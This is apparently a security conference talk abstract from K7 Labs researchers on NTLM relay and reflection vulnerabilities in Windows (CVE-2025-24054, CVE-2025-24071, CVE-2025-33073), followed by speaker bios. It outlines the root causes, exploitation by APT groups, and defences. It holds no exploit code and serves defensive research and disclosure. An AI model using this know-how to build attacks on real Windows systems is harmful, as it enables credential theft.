NTLM Exploit Redux!
Amidst endemic cyber warfare, 2025 has been witnessing a resurgence of credential relay attacks targeting Windows environments to infiltrate government, organisation and individual infrastructure. CISA has reported that the NTLM relay technique is being actively exploited by APT groups such as Fancy Bear (aka APT28), Cozy Bear (aka APT29), Blind Eagle (aka APT-C-36), and UAC-0194.
In March 2025, two closely-linked vulnerabilities, CVE-2025-24054, an SMB hash disclosure spoofing vulnerability, and CVE-2025-24071, a file explorer spoofing vulnerability, were patched by Microsoft. Minimal interaction, like clicking on a file or extracting an archive, could lead to a successful exploitation of these vulnerabilities, resulting in dispatching NTLM hashes over the network into hostile hands. The vulnerabilities’ root cause can be traced to the flawed implementation of Windows’ handling of URL values present in library files (extension .library-ms), thus triggering an SMB request for any UNC paths encountered. The in-the-wild exploitation of CVE-2025-24054 was attributed to Fancy Bear, targeting governments in Poland and Romania. Working exploit code has been reportedly available for sale on the Dark Web.
CVE-2025-33073, an SMB client Elevation of Privilege (EoP) vulnerability, patched in June 2025, is an NTLM reflection attack, wherein the victim’s machine is tricked into performing a local NTLM authentication over SMB giving SYSTEM level access to the attacker. This happens as a result of bypassing security checks when processing a request involving a DNS record that contains a marshalled string (i.e. a server name appended with a magic string generated by encoding server information used for Kerberos authentication) as the domain name. Even though the exploit PoC for the vulnerability was available as soon as the vulnerability was patched, there are no reports of its active in-the-wild exploitation at the time of writing this abstract.
Our previous research on NTLM disclosure vulnerabilities such as CVE-2021-36942 in Windows Local Security Authority (LSA) and CVE-2023-23397 in Outlook, both of which were exploited in-the-wild, provides us with key insights on today’s exploitation mechanisms. Credential relay attacks are clearly far from over, and understanding the low-level kinetics behind these attacks will help defend against such exploitations.
In this presentation, we will detail the root causes leading to the relay attacks based on the exploitation of CVE-2025-24071 and CVE-2025-33073, aided by live demos for both. We will also analyse diffed code that reveals Microsoft’s patches to prevent exploitation of these vulnerabilities. Finally, we will highlight some best practices to defend against these attacks.
Anurag Shandilya – K7 Computing Pvt Ltd
Anurag Shandilya is the Vulnerability Research Manager at K7 Labs. His areas of research include Windows and IoT vulnerabilities. He has 9+ years of experience in Vulnerability Research and Vulnerability Assessment & Penetration Testing (VAPT). He has presented at AVAR (2018, 2020, 2021 and 2022), VB (2019, 2023) and CARO (2020) and actively contributes to the K7 Labs blog.
Arnab Mandal – K7 Computing Pvt Ltd
Arnab Mandal is a Vulnerability Researcher in K7 Labs specializing in Windows Exploitation Techniques. His analyses of various Windows vulnerabilities are detailed on K7 Labs’ technical blog page. He also specializes in identifying, and mitigating vulnerabilities across web and mobile applications, network infrastructure, and APIs.
Satyam Yadav – K7 Computing Pvt Ltd
Satyam Yadav is a Vulnerability Researcher for K7 Computing, specializing in n-day vulnerability analysis in Windows systems. He also brings expertise in identifying and mitigating security risks across web applications, network infrastructure, and APIs. He writes technical blogs that are published on the K7 Labs technical blog page. Additionally, he also authors IDS detection signatures for K7 products.